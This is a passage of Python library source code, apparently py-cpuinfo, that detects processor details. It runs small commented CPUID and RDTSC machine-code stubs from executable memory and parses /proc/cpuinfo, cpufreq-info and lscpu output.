can_selinux_exec_memory = False
for line in output.splitlines():
line = line.strip().lower()
if line.startswith("allow_execheap") and line.endswith("on"):
can_selinux_exec_heap = True
elif line.startswith("allow_execmem") and line.endswith("on"):
can_selinux_exec_memory = True
trace.command_output('can_selinux_exec_heap:', can_selinux_exec_heap)
trace.command_output('can_selinux_exec_memory:', can_selinux_exec_memory)
return (not can_selinux_exec_heap or not can_selinux_exec_memory)
def _filter_dict_keys_with_empty_values(info):
# Filter out None, 0, "", (), {}, []
info = {k: v for k, v in info.items() if v}
# Filter out (0, 0)
info = {k: v for k, v in info.items() if v != (0, 0)}
# Filter out strings that start with "0.0"
info = {k: v for k, v in info.items() if not (type(v) == str and v.startswith('0.0'))}
return info
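# Runs raw machine code from Python: the byte string is copied into an
# executable memory region (VirtualAlloc/VirtualProtect on Windows, an
# anonymous executable mmap elsewhere) and wrapped in a ctypes function
# pointer so it can be called like a normal function.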
class ASM(object):
def __init__(self, restype=None, argtypes=(), machine_code=[]):
self.restype = restype
self.argtypes = argtypes
self.machine_code = machine_code
self.prochandle = None
self.mm = None
self.func = None
self.address = None
self.size = 0
def compile(self):
machine_code = bytes.join(b'', self.machine_code)
self.size = ctypes.c_size_t(len(machine_code))
if DataSource.is_windows:
# Allocate a memory segment the size of the machine code, and make it executable
size = len(machine_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
self.address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not self.address:
raise Exception("Failed to VirtualAlloc")
# Copy the machine code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(self.address, machine_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(self.address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(self.address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
from mmap import mmap, MAP_PRIVATE, MAP_ANONYMOUS, PROT_WRITE, PROT_READ, PROT_EXEC
# Allocate a private and executable memory segment the size of the machine code
machine_code = bytes.join(b'', self.machine_code)
self.size = len(machine_code)
self.mm = mmap(-1, self.size, flags=MAP_PRIVATE | MAP_ANONYMOUS, prot=PROT_WRITE | PROT_READ | PROT_EXEC)
# Copy the machine code into the memory segment
self.mm.write(machine_code)
self.address = ctypes.addressof(ctypes.c_int.from_buffer(self.mm))
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(self.restype, *self.argtypes)
self.func = functype(self.address)
def run(self):
# Call the machine code like a function
retval = self.func()
return retval
def free(self):
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(self.address), ctypes.c_size_t(0), MEM_RELEASE)
else:
self.mm.close()
self.prochandle = None
self.mm = None
self.func = None
self.address = None
self.size = 0
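# Queries the x86 CPUID instruction directly by assembling tiny stubs with
# the ASM class above. Each helper runs cpuid for a particular EAX leaf and
# returns one register of the result.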
class CPUID(object):
def __init__(self, trace=None):
if trace == None:
trace = Trace(False, False)
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = _is_selinux_enforcing(trace)
def _asm_func(self, restype=None, argtypes=(), machine_code=[]):
asm = ASM(restype, argtypes, machine_code)
asm.compile()
return asm
def _run_asm(self, *machine_code):
asm = ASM(ctypes.c_uint32, (), machine_code)
asm.compile()
retval = asm.run()
asm.free()
return retval
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
		# Each byte of EBX, EDX and ECX is one ASCII character of the vendor ID string
vendor_id = []
for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping_id = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family_id = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model_id = (eax >> 16) & 0xF # 4 bits
extended_family_id = (eax >> 20) & 0xFF # 8 bits
family = 0
if family_id in [15]:
family = extended_family_id + family_id
else:
family = family_id
if family_id in [6, 15]:
model = (extended_model_id << 4) + model
return {
'stepping' : stepping_id,
'model' : model,
'family' : family,
'processor_type' : processor_type
}
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : _is_bit_set(edx, 0),
'vme' : _is_bit_set(edx, 1),
'de' : _is_bit_set(edx, 2),
'pse' : _is_bit_set(edx, 3),
'tsc' : _is_bit_set(edx, 4),
'msr' : _is_bit_set(edx, 5),
'pae' : _is_bit_set(edx, 6),
'mce' : _is_bit_set(edx, 7),
'cx8' : _is_bit_set(edx, 8),
'apic' : _is_bit_set(edx, 9),
#'reserved1' : _is_bit_set(edx, 10),
'sep' : _is_bit_set(edx, 11),
'mtrr' : _is_bit_set(edx, 12),
'pge' : _is_bit_set(edx, 13),
'mca' : _is_bit_set(edx, 14),
'cmov' : _is_bit_set(edx, 15),
'pat' : _is_bit_set(edx, 16),
'pse36' : _is_bit_set(edx, 17),
'pn' : _is_bit_set(edx, 18),
'clflush' : _is_bit_set(edx, 19),
#'reserved2' : _is_bit_set(edx, 20),
'dts' : _is_bit_set(edx, 21),
'acpi' : _is_bit_set(edx, 22),
'mmx' : _is_bit_set(edx, 23),
'fxsr' : _is_bit_set(edx, 24),
'sse' : _is_bit_set(edx, 25),
'sse2' : _is_bit_set(edx, 26),
'ss' : _is_bit_set(edx, 27),
'ht' : _is_bit_set(edx, 28),
'tm' : _is_bit_set(edx, 29),
'ia64' : _is_bit_set(edx, 30),
'pbe' : _is_bit_set(edx, 31),
'pni' : _is_bit_set(ecx, 0),
'pclmulqdq' : _is_bit_set(ecx, 1),
'dtes64' : _is_bit_set(ecx, 2),
'monitor' : _is_bit_set(ecx, 3),
'ds_cpl' : _is_bit_set(ecx, 4),
'vmx' : _is_bit_set(ecx, 5),
'smx' : _is_bit_set(ecx, 6),
'est' : _is_bit_set(ecx, 7),
'tm2' : _is_bit_set(ecx, 8),
'ssse3' : _is_bit_set(ecx, 9),
'cid' : _is_bit_set(ecx, 10),
#'reserved3' : _is_bit_set(ecx, 11),
'fma' : _is_bit_set(ecx, 12),
'cx16' : _is_bit_set(ecx, 13),
'xtpr' : _is_bit_set(ecx, 14),
'pdcm' : _is_bit_set(ecx, 15),
#'reserved4' : _is_bit_set(ecx, 16),
'pcid' : _is_bit_set(ecx, 17),
'dca' : _is_bit_set(ecx, 18),
'sse4_1' : _is_bit_set(ecx, 19),
'sse4_2' : _is_bit_set(ecx, 20),
'x2apic' : _is_bit_set(ecx, 21),
'movbe' : _is_bit_set(ecx, 22),
'popcnt' : _is_bit_set(ecx, 23),
'tscdeadline' : _is_bit_set(ecx, 24),
'aes' : _is_bit_set(ecx, 25),
'xsave' : _is_bit_set(ecx, 26),
'osxsave' : _is_bit_set(ecx, 27),
'avx' : _is_bit_set(ecx, 28),
'f16c' : _is_bit_set(ecx, 29),
'rdrnd' : _is_bit_set(ecx, 30),
'hypervisor' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
b"\x31\xC9", # xor ecx,ecx
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\x31\xC9", # xor ecx,ecx
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : _is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : _is_bit_set(ebx, 1),
'sgx' : _is_bit_set(ebx, 2),
'bmi1' : _is_bit_set(ebx, 3),
'hle' : _is_bit_set(ebx, 4),
'avx2' : _is_bit_set(ebx, 5),
#'reserved' : _is_bit_set(ebx, 6),
'smep' : _is_bit_set(ebx, 7),
'bmi2' : _is_bit_set(ebx, 8),
'erms' : _is_bit_set(ebx, 9),
'invpcid' : _is_bit_set(ebx, 10),
'rtm' : _is_bit_set(ebx, 11),
'pqm' : _is_bit_set(ebx, 12),
#'FPU CS and FPU DS deprecated' : _is_bit_set(ebx, 13),
'mpx' : _is_bit_set(ebx, 14),
'pqe' : _is_bit_set(ebx, 15),
'avx512f' : _is_bit_set(ebx, 16),
'avx512dq' : _is_bit_set(ebx, 17),
'rdseed' : _is_bit_set(ebx, 18),
'adx' : _is_bit_set(ebx, 19),
'smap' : _is_bit_set(ebx, 20),
'avx512ifma' : _is_bit_set(ebx, 21),
'pcommit' : _is_bit_set(ebx, 22),
'clflushopt' : _is_bit_set(ebx, 23),
'clwb' : _is_bit_set(ebx, 24),
'intel_pt' : _is_bit_set(ebx, 25),
'avx512pf' : _is_bit_set(ebx, 26),
'avx512er' : _is_bit_set(ebx, 27),
'avx512cd' : _is_bit_set(ebx, 28),
'sha' : _is_bit_set(ebx, 29),
'avx512bw' : _is_bit_set(ebx, 30),
'avx512vl' : _is_bit_set(ebx, 31),
'prefetchwt1' : _is_bit_set(ecx, 0),
'avx512vbmi' : _is_bit_set(ecx, 1),
'umip' : _is_bit_set(ecx, 2),
'pku' : _is_bit_set(ecx, 3),
'ospke' : _is_bit_set(ecx, 4),
#'reserved' : _is_bit_set(ecx, 5),
'avx512vbmi2' : _is_bit_set(ecx, 6),
#'reserved' : _is_bit_set(ecx, 7),
'gfni' : _is_bit_set(ecx, 8),
'vaes' : _is_bit_set(ecx, 9),
'vpclmulqdq' : _is_bit_set(ecx, 10),
'avx512vnni' : _is_bit_set(ecx, 11),
'avx512bitalg' : _is_bit_set(ecx, 12),
#'reserved' : _is_bit_set(ecx, 13),
'avx512vpopcntdq' : _is_bit_set(ecx, 14),
#'reserved' : _is_bit_set(ecx, 15),
#'reserved' : _is_bit_set(ecx, 16),
#'mpx0' : _is_bit_set(ecx, 17),
#'mpx1' : _is_bit_set(ecx, 18),
#'mpx2' : _is_bit_set(ecx, 19),
#'mpx3' : _is_bit_set(ecx, 20),
#'mpx4' : _is_bit_set(ecx, 21),
'rdpid' : _is_bit_set(ecx, 22),
#'reserved' : _is_bit_set(ecx, 23),
#'reserved' : _is_bit_set(ecx, 24),
#'reserved' : _is_bit_set(ecx, 25),
#'reserved' : _is_bit_set(ecx, 26),
#'reserved' : _is_bit_set(ecx, 27),
#'reserved' : _is_bit_set(ecx, 28),
#'reserved' : _is_bit_set(ecx, 29),
'sgx_lc' : _is_bit_set(ecx, 30),
#'reserved' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : _is_bit_set(ebx, 0),
'vme' : _is_bit_set(ebx, 1),
'de' : _is_bit_set(ebx, 2),
'pse' : _is_bit_set(ebx, 3),
'tsc' : _is_bit_set(ebx, 4),
'msr' : _is_bit_set(ebx, 5),
'pae' : _is_bit_set(ebx, 6),
'mce' : _is_bit_set(ebx, 7),
'cx8' : _is_bit_set(ebx, 8),
'apic' : _is_bit_set(ebx, 9),
#'reserved' : _is_bit_set(ebx, 10),
'syscall' : _is_bit_set(ebx, 11),
'mtrr' : _is_bit_set(ebx, 12),
'pge' : _is_bit_set(ebx, 13),
'mca' : _is_bit_set(ebx, 14),
'cmov' : _is_bit_set(ebx, 15),
'pat' : _is_bit_set(ebx, 16),
'pse36' : _is_bit_set(ebx, 17),
#'reserved' : _is_bit_set(ebx, 18),
'mp' : _is_bit_set(ebx, 19),
'nx' : _is_bit_set(ebx, 20),
#'reserved' : _is_bit_set(ebx, 21),
'mmxext' : _is_bit_set(ebx, 22),
'mmx' : _is_bit_set(ebx, 23),
'fxsr' : _is_bit_set(ebx, 24),
'fxsr_opt' : _is_bit_set(ebx, 25),
				'pdpe1gb' : _is_bit_set(ebx, 26),
'rdtscp' : _is_bit_set(ebx, 27),
#'reserved' : _is_bit_set(ebx, 28),
'lm' : _is_bit_set(ebx, 29),
'3dnowext' : _is_bit_set(ebx, 30),
'3dnow' : _is_bit_set(ebx, 31),
'lahf_lm' : _is_bit_set(ecx, 0),
'cmp_legacy' : _is_bit_set(ecx, 1),
'svm' : _is_bit_set(ecx, 2),
'extapic' : _is_bit_set(ecx, 3),
'cr8_legacy' : _is_bit_set(ecx, 4),
'abm' : _is_bit_set(ecx, 5),
'sse4a' : _is_bit_set(ecx, 6),
'misalignsse' : _is_bit_set(ecx, 7),
'3dnowprefetch' : _is_bit_set(ecx, 8),
'osvw' : _is_bit_set(ecx, 9),
'ibs' : _is_bit_set(ecx, 10),
'xop' : _is_bit_set(ecx, 11),
'skinit' : _is_bit_set(ecx, 12),
'wdt' : _is_bit_set(ecx, 13),
#'reserved' : _is_bit_set(ecx, 14),
'lwp' : _is_bit_set(ecx, 15),
'fma4' : _is_bit_set(ecx, 16),
'tce' : _is_bit_set(ecx, 17),
#'reserved' : _is_bit_set(ecx, 18),
'nodeid_msr' : _is_bit_set(ecx, 19),
#'reserved' : _is_bit_set(ecx, 20),
'tbm' : _is_bit_set(ecx, 21),
'topoext' : _is_bit_set(ecx, 22),
'perfctr_core' : _is_bit_set(ecx, 23),
'perfctr_nb' : _is_bit_set(ecx, 24),
#'reserved' : _is_bit_set(ecx, 25),
'dbx' : _is_bit_set(ecx, 26),
'perftsc' : _is_bit_set(ecx, 27),
'pci_l2i' : _is_bit_set(ecx, 28),
#'reserved' : _is_bit_set(ecx, 29),
#'reserved' : _is_bit_set(ecx, 30),
#'reserved' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
processor_brand = ""
# Processor brand string
if max_extension_support >= 0x80000004:
instructions = [
b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
b"\xB8\x04\x00\x00\x80" # mov ax,0x80000004
]
for instruction in instructions:
# EAX
eax = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC0" # mov ax,ax
b"\xC3" # ret
)
# EBX
ebx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Combine each of the 4 bytes in each register into the string
for reg in [eax, ebx, ecx, edx]:
for n in [0, 8, 16, 24]:
processor_brand += chr((reg >> n) & 0xFF)
# Strip off any trailing NULL terminators and white space
processor_brand = processor_brand.strip("\0").strip()
return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
cache_info = {}
# Just return if the cache feature is not supported
if max_extension_support < 0x80000006:
return cache_info
# ECX
ecx = self._run_asm(
b"\xB8\x06\x00\x00\x80" # mov ax,0x80000006
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
cache_info = {
'size_b' : (ecx & 0xFF) * 1024,
'associativity' : (ecx >> 12) & 0xF,
'line_size_b' : (ecx >> 16) & 0xFFFF
}
return cache_info
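	# Build a callable that reads the CPU time stamp counter via RDTSC.
	# On x86_32 the 64 bit counter is written into two uint32 out-parameters
	# and recombined in Python; on x86_64 it is returned directly in RAX.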
def get_ticks_func(self):
retval = None
if DataSource.bits == '32bit':
# Works on x86_32
restype = None
argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
get_ticks_x86_32 = self._asm_func(restype, argtypes,
[
b"\x55", # push bp
b"\x89\xE5", # mov bp,sp
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x8B\x5D\x08", # mov bx,[di+0x8]
b"\x8B\x4D\x0C", # mov cx,[di+0xc]
b"\x89\x13", # mov [bp+di],dx
b"\x89\x01", # mov [bx+di],ax
b"\x5D", # pop bp
b"\xC3" # ret
]
)
# Monkey patch func to combine high and low args into one return
old_func = get_ticks_x86_32.func
def new_func():
# Pass two uint32s into function
high = ctypes.c_uint32(0)
low = ctypes.c_uint32(0)
old_func(ctypes.byref(high), ctypes.byref(low))
# Shift the two uint32s into one uint64
retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
return retval
get_ticks_x86_32.func = new_func
retval = get_ticks_x86_32
elif DataSource.bits == '64bit':
# Works on x86_64
restype = ctypes.c_uint64
argtypes = ()
get_ticks_x86_64 = self._asm_func(restype, argtypes,
[
b"\x48", # dec ax
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x48", # dec ax
b"\xC1\xE2\x20", # shl dx,byte 0x20
b"\x48", # dec ax
b"\x09\xD0", # or ax,dx
b"\xC3", # ret
]
)
retval = get_ticks_x86_64
return retval
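	# Estimate the CPU frequency by counting how many time stamp counter ticks
	# elapse over a one second sleep.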
def get_raw_hz(self):
from time import sleep
ticks_fn = self.get_ticks_func()
start = ticks_fn.func()
sleep(1)
end = ticks_fn.func()
ticks = (end - start)
ticks_fn.free()
return ticks
def _get_cpu_info_from_cpuid_actual():
'''
Warning! This function has the potential to crash the Python runtime.
Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
It will safely call this function in another process.
'''
if IS_PY2:
from cStringIO import StringIO
else:
from io import StringIO
trace = Trace(True, True)
info = {}
# Pipe stdout and stderr to strings
sys.stdout = trace._stdout
sys.stderr = trace._stderr
try:
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
# Return none if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
trace.fail('Not running on X86_32 or X86_64. Skipping ...')
return trace.to_dict(info, True)
# Return none if SE Linux is in enforcing mode
cpuid = CPUID(trace)
if cpuid.is_selinux_enforcing:
trace.fail('SELinux is enforcing. Skipping ...')
return trace.to_dict(info, True)
# Get the cpu info from the CPUID register
max_extension_support = cpuid.get_max_extension_support()
cache_info = cpuid.get_cache(max_extension_support)
info = cpuid.get_info()
processor_brand = cpuid.get_processor_brand(max_extension_support)
		# Measure the actual Hz by counting time stamp counter ticks
hz_actual = cpuid.get_raw_hz()
hz_actual = _to_decimal_string(hz_actual)
		# Parse the advertised Hz and scale from the processor brand string
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
info = {
'vendor_id_raw' : cpuid.get_vendor_id(),
'hardware_raw' : '',
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'l2_cache_size' : cache_info['size_b'],
'l2_cache_line_size' : cache_info['line_size_b'],
'l2_cache_associativity' : cache_info['associativity'],
'stepping' : info['stepping'],
'model' : info['model'],
'family' : info['family'],
'processor_type' : info['processor_type'],
'flags' : cpuid.get_flags(max_extension_support)
}
info = _filter_dict_keys_with_empty_values(info)
trace.success()
except Exception as err:
from traceback import format_exc
err_string = format_exc()
trace._err = ''.join(['\t\t{0}\n'.format(n) for n in err_string.split('\n')]) + '\n'
return trace.to_dict(info, True)
return trace.to_dict(info, False)
def _get_cpu_info_from_cpuid_subprocess_wrapper(queue):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
output = _get_cpu_info_from_cpuid_actual()
sys.stdout = orig_stdout
sys.stderr = orig_stderr
queue.put(_obj_to_b64(output))
def _get_cpu_info_from_cpuid():
'''
Returns the CPU info gathered by querying the X86 cpuid register in a new process.
Returns {} on non X86 cpus.
Returns {} if SELinux is in enforcing mode.
'''
	g_trace.header('Trying to get info from CPUID ...')
from multiprocessing import Process, Queue
# Return {} if can't cpuid
if not DataSource.can_cpuid:
g_trace.fail('Can\'t CPUID. Skipping ...')
return {}
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
# Return {} if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
g_trace.fail('Not running on X86_32 or X86_64. Skipping ...')
return {}
try:
if CAN_CALL_CPUID_IN_SUBPROCESS:
# Start running the function in a subprocess
queue = Queue()
p = Process(target=_get_cpu_info_from_cpuid_subprocess_wrapper, args=(queue,))
p.start()
# Wait for the process to end, while it is still alive
while p.is_alive():
p.join(0)
# Return {} if it failed
if p.exitcode != 0:
g_trace.fail('Failed to run CPUID in process. Skipping ...')
return {}
# Return {} if no results
if queue.empty():
g_trace.fail('Failed to get anything from CPUID process. Skipping ...')
return {}
# Return the result, only if there is something to read
else:
output = _b64_to_obj(queue.get())
import pprint
pp = pprint.PrettyPrinter(indent=4)
#pp.pprint(output)
if 'output' in output and output['output']:
g_trace.write(output['output'])
if 'stdout' in output and output['stdout']:
sys.stdout.write('{0}\n'.format(output['stdout']))
sys.stdout.flush()
if 'stderr' in output and output['stderr']:
sys.stderr.write('{0}\n'.format(output['stderr']))
sys.stderr.flush()
if 'is_fail' not in output:
g_trace.fail('Failed to get is_fail from CPUID process. Skipping ...')
return {}
# Fail if there was an exception
if 'err' in output and output['err']:
g_trace.fail('Failed to run CPUID in process. Skipping ...')
g_trace.write(output['err'])
g_trace.write('Failed ...')
return {}
if 'is_fail' in output and output['is_fail']:
g_trace.write('Failed ...')
return {}
if 'info' not in output or not output['info']:
g_trace.fail('Failed to get return info from CPUID process. Skipping ...')
return {}
return output['info']
else:
# FIXME: This should write the values like in the above call to actual
orig_stdout = sys.stdout
orig_stderr = sys.stderr
output = _get_cpu_info_from_cpuid_actual()
sys.stdout = orig_stdout
sys.stderr = orig_stderr
g_trace.success()
return output['info']
except Exception as err:
g_trace.fail(err)
pass
# Return {} if everything failed
return {}
def _get_cpu_info_from_proc_cpuinfo():
'''
Returns the CPU info gathered from /proc/cpuinfo.
Returns {} if /proc/cpuinfo is not found.
'''
	g_trace.header('Trying to get info from /proc/cpuinfo ...')
try:
# Just return {} if there is no cpuinfo
if not DataSource.has_proc_cpuinfo():
g_trace.fail('Failed to find /proc/cpuinfo. Skipping ...')
return {}
returncode, output = DataSource.cat_proc_cpuinfo()
if returncode != 0:
g_trace.fail('Failed to run cat /proc/cpuinfo. Skipping ...')
return {}
# Various fields
vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
processor_brand = _get_field(True, output, None, None, 'model name', 'cpu', 'processor', 'uarch')
cache_size = _get_field(False, output, None, '', 'cache size')
stepping = _get_field(False, output, int, 0, 'stepping')
model = _get_field(False, output, int, 0, 'model')
family = _get_field(False, output, int, 0, 'cpu family')
hardware = _get_field(False, output, None, '', 'Hardware')
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features', 'ASEs implemented')
if flags:
flags = flags.split()
flags.sort()
# Check for other cache format
if not cache_size:
try:
for i in range(0, 10):
name = "cache{0}".format(i)
value = _get_field(False, output, None, None, name)
if value:
value = [entry.split('=') for entry in value.split(' ')]
value = dict(value)
if 'level' in value and value['level'] == '3' and 'size' in value:
cache_size = value['size']
break
except Exception:
pass
# Convert from MHz string to Hz
hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock', 'cpu MHz dynamic', 'cpu MHz static')
hz_actual = hz_actual.lower().rstrip('mhz').strip()
hz_actual = _to_decimal_string(hz_actual)
# Convert from GHz/MHz string to Hz
hz_advertised, scale = (None, 0)
try:
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
except Exception:
pass
info = {
'hardware_raw' : hardware,
'brand_raw' : processor_brand,
'l3_cache_size' : _friendly_bytes_to_int(cache_size),
'flags' : flags,
'vendor_id_raw' : vendor_id,
'stepping' : stepping,
'model' : model,
'family' : family,
}
# Make the Hz the same for actual and advertised if missing any
if not hz_advertised or hz_advertised == '0.0':
hz_advertised = hz_actual
scale = 6
elif not hz_actual or hz_actual == '0.0':
hz_actual = hz_advertised
# Add the Hz if there is one
if _hz_short_to_full(hz_advertised, scale) > (0, 0):
info['hz_advertised_friendly'] = _hz_short_to_friendly(hz_advertised, scale)
info['hz_advertised'] = _hz_short_to_full(hz_advertised, scale)
if _hz_short_to_full(hz_actual, scale) > (0, 0):
info['hz_actual_friendly'] = _hz_short_to_friendly(hz_actual, 6)
info['hz_actual'] = _hz_short_to_full(hz_actual, 6)
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_cpufreq_info():
'''
Returns the CPU info gathered from cpufreq-info.
Returns {} if cpufreq-info is not found.
'''
	g_trace.header('Trying to get info from cpufreq-info ...')
try:
hz_brand, scale = '0.0', 0
if not DataSource.has_cpufreq_info():
g_trace.fail('Failed to find cpufreq-info. Skipping ...')
return {}
returncode, output = DataSource.cpufreq_info()
if returncode != 0:
g_trace.fail('Failed to run cpufreq-info. Skipping ...')
return {}
hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
i = hz_brand.find('Hz')
assert(i != -1)
hz_brand = hz_brand[0 : i+2].strip().lower()
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = _to_decimal_string(hz_brand)
info = {
'hz_advertised_friendly' : _hz_short_to_friendly(hz_brand, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_brand, scale),
'hz_advertised' : _hz_short_to_full(hz_brand, scale),
'hz_actual' : _hz_short_to_full(hz_brand, scale),
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_lscpu():
'''
Returns the CPU info gathered from lscpu.
Returns {} if lscpu is not found.
'''
	g_trace.header('Trying to get info from lscpu ...')
try:
if not DataSource.has_lscpu():
g_trace.fail('Failed to find lscpu. Skipping ...')
return {}
returncode, output = DataSource.lscpu()
